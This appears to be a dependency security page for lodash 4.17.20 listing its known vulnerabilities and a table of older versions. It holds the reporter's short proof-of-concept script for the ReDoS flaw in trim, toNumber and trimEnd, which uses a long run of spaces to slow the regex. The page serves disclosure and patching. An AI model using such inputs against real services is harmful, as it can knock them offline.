NodeJS/lodash/4.17.20
Lodash modular utilities.
https://www.npmjs.com/package/lodash
MIT
3 Security Vulnerabilities
Regular Expression Denial of Service (ReDoS) in lodash
- https://nvd.nist.gov/vuln/detail/CVE-2020-28500
- https://github.com/lodash/lodash/pull/5065
- https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
- https://github.com/lodash/lodash/blob/npm/trimEnd.js#L8
- https://security.netapp.com/advisory/ntap-20210312-0006/
- https://snyk.io/vuln/SNYK-JS-LODASH-1018905
- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
- https://www.oracle.com/security-alerts/cpujul2021.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://github.com/advisories/GHSA-29mw-wpgm-hmr9
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.
Steps to reproduce (provided by reporter Liyuan Chen):
```js
var lo = require('lodash');

// Build a string of the form "1" + n spaces + "1". The long run of
// whitespace between two non-space characters is what makes the
// trimming regex backtrack, so the call time grows with n.
function build_blank(n) {
  var ret = "1";
  for (var i = 0; i < n; i++) {
    ret += " ";
  }
  return ret + "1";
}

var s = build_blank(50000);

var time0 = Date.now();
lo.trim(s);
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);

var time1 = Date.now();
lo.toNumber(s);
var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);

var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
```
Command Injection in lodash
- https://nvd.nist.gov/vuln/detail/CVE-2021-23337
- https://github.com/advisories/GHSA-35jh-r3h4-6jhm
- https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
- https://security.netapp.com/advisory/ntap-20210312-0006/
- https://snyk.io/vuln/SNYK-JS-LODASH-1040724
- https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851
- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929
- https://www.oracle.com/security-alerts/cpujul2021.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Withdrawn: Arbitrary code execution in lodash
Withdrawn
GitHub has chosen to publish this CVE as a withdrawn advisory due to it not being a security issue. See this issue for more details.
CVE description
"** DISPUTED ** A command injection vulnerability in Lodash 4.17.21 allows attackers to achieve arbitrary code execution via the template function. This is a different parameter, method, and version than CVE-2021-23337. NOTE: the vendor's position is that it's the developer's responsibility to ensure that a template does not evaluate code that originates from untrusted input."
114 Other Versions
Version | License | Security | Released | Age |
---|---|---|---|---|
0.1.0 | MIT | 9 | 2012-04-23 - 16:37 | about 12 years |
0.2.0 | MIT | 9 | 2012-05-22 - 04:06 | almost 12 years |
0.2.1 | MIT | 9 | 2012-05-24 - 21:53 | almost 12 years |
0.2.2 | MIT | 9 | 2012-05-30 - 07:56 | almost 12 years |
0.3.0 | MIT | 9 | 2012-06-06 - 20:01 | almost 12 years |
0.3.1 | MIT | 9 | 2012-06-11 - 04:12 | almost 12 years |
0.3.2 | MIT | 9 | 2012-06-14 - 19:19 | almost 12 years |
0.4.0 | MIT | 9 | 2012-07-11 - 17:14 | almost 12 years |
0.4.1 | MIT | 9 | 2012-07-12 - 04:56 | almost 12 years |
0.4.2 | MIT | 9 | 2012-07-16 - 18:49 | almost 12 years |
0.5.0-rc.1 | MIT | 9 | 2012-08-07 - 15:08 | almost 12 years |
0.5.0 | MIT | 9 | 2012-08-17 - 20:13 | over 11 years |
0.5.1 | MIT | 9 | 2012-08-18 - 20:15 | over 11 years |
0.5.2 | MIT | 9 | 2012-08-22 - 16:22 | over 11 years |
0.6.0 | MIT | 9 | 2012-08-28 - 16:01 | over 11 years |
0.6.1 | MIT | 9 | 2012-08-30 - 08:01 | over 11 years |
0.7.0 | MIT | 9 | 2012-09-11 - 16:24 | over 11 years |
0.8.0 | MIT | 9 | 2012-10-02 - 06:49 | over 11 years |
0.8.1 | MIT | 9 | 2012-10-04 - 08:53 | over 11 years |
0.8.2 | MIT | 9 | 2012-10-10 - 07:51 | over 11 years |
0.9.0 | MIT | 9 | 2013-08-31 - 04:46 | over 10 years |
0.9.1 | MIT | 9 | 2013-08-31 - 04:49 | over 10 years |
0.9.2 | MIT | 9 | 2013-08-31 - 04:52 | over 10 years |
0.10.0 | MIT | 9 | 2013-08-31 - 04:56 | over 10 years |
1.0.0-rc.1 | MIT | 9 | 2013-08-31 - 05:00 | over 10 years |
1.0.0-rc.2 | MIT | 9 | 2013-08-31 - 05:05 | over 10 years |
1.0.0-rc.3 | MIT | 9 | 2013-08-31 - 05:08 | over 10 years |
1.0.0 | MIT | 9 | 2013-08-31 - 05:11 | over 10 years |
1.0.1 | MIT | 9 | 2013-08-31 - 05:16 | over 10 years |
1.1.0 | MIT | 9 | 2013-09-04 - 14:23 | over 10 years |
1.1.1 | MIT | 9 | 2013-09-04 - 14:24 | over 10 years |
1.2.0 | MIT | 9 | 2013-09-04 - 14:24 | over 10 years |
1.2.1 | MIT | 9 | 2013-09-04 - 14:24 | over 10 years |
1.3.0 | MIT | 9 | 2013-09-04 - 14:25 | over 10 years |
1.3.1 | MIT | 9 | 2013-09-04 - 14:25 | over 10 years |
2.0.0 | MIT | 9 | 2013-09-14 - 04:22 | over 10 years |
2.1.0 | MIT | 9 | 2013-09-23 - 05:57 | over 10 years |
2.2.0 | MIT | 9 | 2013-09-29 - 21:52 | over 10 years |
2.2.1 | MIT | 9 | 2013-10-03 - 18:29 | over 10 years |
2.3.0 | MIT | 9 | 2013-11-11 - 17:30 | over 10 years |
2.4.0 | MIT | 9 | 2013-11-26 - 19:40 | over 10 years |
2.4.1 | MIT | 9 | 2013-12-03 - 16:51 | over 10 years |
3.0.0 | MIT | 9 | 2015-01-26 - 15:09 | over 9 years |
3.0.1 | MIT | 9 | 2015-01-30 - 09:33 | over 9 years |
3.1.0 | MIT | 9 | 2015-02-03 - 16:53 | over 9 years |
3.2.0 | MIT | 9 | 2015-02-12 - 17:01 | over 9 years |
3.3.0 | MIT | 9 | 2015-02-20 - 17:08 | about 9 years |
3.3.1 | MIT | 9 | 2015-02-24 - 16:02 | about 9 years |
3.4.0 | MIT | 9 | 2015-03-06 - 16:44 | about 9 years |
3.5.0 | MIT | 9 | 2015-03-09 - 05:01 | about 9 years |
3.6.0 | MIT | 9 | 2015-03-25 - 15:36 | about 9 years |
1.0.2 | MIT | 9 | 2015-03-30 - 15:58 | about 9 years |
3.7.0 | MIT | 10 | 2015-04-16 - 15:47 | about 9 years |
2.4.2 | MIT | 9 | 2015-04-26 - 21:04 | about 9 years |
3.8.0 | MIT | 10 | 2015-05-01 - 15:45 | about 9 years |
3.9.0 | MIT | 10 | 2015-05-19 - 18:26 | almost 9 years |
3.9.1 | MIT | 10 | 2015-05-19 - 21:00 | almost 9 years |
3.9.2 | MIT | 10 | 2015-05-24 - 20:57 | almost 9 years |
3.9.3 | MIT | 10 | 2015-05-26 - 01:47 | almost 9 years |
3.10.0 | MIT | 10 | 2015-06-30 - 15:13 | almost 9 years |
3.10.1 | MIT | 10 | 2015-08-04 - 06:05 | almost 9 years |
4.0.0 | MIT | 10 | 2016-01-12 - 23:13 | over 8 years |
4.0.1 | MIT | 10 | 2016-01-25 - 16:06 | over 8 years |
4.1.0 | MIT | 10 | 2016-01-29 - 16:33 | over 8 years |
4.2.0 | MIT | 10 | 2016-02-02 - 08:50 | over 8 years |
4.2.1 | MIT | 10 | 2016-02-03 - 16:00 | over 8 years |
4.3.0 | MIT | 10 | 2016-02-08 - 08:57 | over 8 years |
4.4.0 | MIT | 10 | 2016-02-16 - 07:10 | about 8 years |
4.5.0 | MIT | 10 | 2016-02-17 - 08:39 | about 8 years |
4.5.1 | MIT | 10 | 2016-02-22 - 06:42 | about 8 years |
4.6.0 | MIT | 10 | 2016-03-02 - 03:24 | about 8 years |
4.6.1 | MIT | 10 | 2016-03-02 - 18:09 | about 8 years |
4.7.0 | MIT | 10 | 2016-03-31 - 15:46 | about 8 years |
4.8.0 | MIT | 10 | 2016-04-04 - 14:54 | about 8 years |
4.8.1 | MIT | 10 | 2016-04-04 - 15:43 | about 8 years |
4.8.2 | MIT | 10 | 2016-04-05 - 02:15 | about 8 years |
4.9.0 | MIT | 10 | 2016-04-08 - 15:22 | about 8 years |
4.10.0 | MIT | 10 | 2016-04-11 - 14:43 | about 8 years |
4.11.0 | MIT | 10 | 2016-04-13 - 15:32 | about 8 years |
4.11.1 | MIT | 10 | 2016-04-14 - 07:21 | about 8 years |
4.11.2 | MIT | 10 | 2016-05-02 - 15:01 | about 8 years |
4.12.0 | MIT | 10 | 2016-05-08 - 19:25 | about 8 years |
4.13.0 | MIT | 10 | 2016-05-23 - 05:07 | almost 8 years |
4.13.1 | MIT | 10 | 2016-05-23 - 15:59 | almost 8 years |
4.14.0 | MIT | 10 | 2016-07-24 - 18:40 | almost 8 years |
4.14.1 | MIT | 10 | 2016-07-29 - 14:49 | almost 8 years |
4.14.2 | MIT | 10 | 2016-08-08 - 15:35 | almost 8 years |
4.15.0 | MIT | 10 | 2016-08-12 - 14:39 | almost 8 years |
4.16.0 | MIT | 10 | 2016-09-19 - 14:59 | over 7 years |
4.16.1 | MIT | 10 | 2016-09-20 - 16:59 | over 7 years |
4.16.2 | MIT | 10 | 2016-09-26 - 03:11 | over 7 years |
4.16.3 | MIT | 10 | 2016-10-03 - 16:43 | over 7 years |
4.16.4 | MIT | 10 | 2016-10-06 - 15:13 | over 7 years |
4.16.5 | MIT | 10 | 2016-10-31 - 06:49 | over 7 years |
4.16.6 | MIT | 10 | 2016-11-01 - 06:38 | over 7 years |
4.17.0 | MIT | 10 | 2016-11-14 - 07:00 | over 7 years |
4.17.1 | MIT | 10 | 2016-11-15 - 07:03 | over 7 years |
4.17.2 | MIT | 10 | 2016-11-16 - 07:21 | over 7 years |
4.17.3 | MIT | 10 | 2016-12-24 - 14:25 | over 7 years |
4.17.4 | MIT | 10 | 2016-12-31 - 22:33 | over 7 years |